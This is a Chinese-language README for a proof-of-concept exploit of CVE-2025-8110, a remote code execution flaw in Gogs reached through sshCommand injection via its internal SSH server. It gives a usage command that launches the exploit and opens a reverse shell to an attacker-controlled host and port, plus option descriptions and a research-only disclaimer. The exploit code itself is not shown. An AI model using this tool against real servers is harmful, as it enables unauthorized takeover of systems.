
CVE-2025-8110 PoC
此仓库包含 CVE-2025-8110 的概念验证(PoC),该漏洞是 Gogs 中的一个远程代码执行(RCE)漏洞。该漏洞利用内部 SSH 服务器实现,允许攻击者通过 sshCommand 配置注入恶意命令。
要运行此漏洞利用,请使用 CVE-2025-8110.py 脚本,并指定目标 Gogs URL 以及您用于反弹 shell 的监听主机/端口。
python3 CVE-2025-8110.py -u <TARGET_URL> -lh <ATTACKER_IP> -lp <ATTACKER_PORT>
-u, --url:目标 Gogs 实例的基 URL(例如 http://localhost:3000)。-lh, --host:反弹 shell 应回连的 IP 地址。-lp, --port:反弹 shell 应回连的端口。-x, --proxy:(可选)在 http://localhost:8080 使用本地代理进行调试。此概念验证(PoC)仅用于教育和研究目的。旨在帮助安全研究员和管理员理解并缓解 CVE-2025-8110 漏洞。
作者对任何未经授权或恶意使用此代码的行为不承担任何责任。请仅在你拥有或获得明确许可的系统上使用此工具。使用此代码即表示你同意对自己的行为承担全部责任。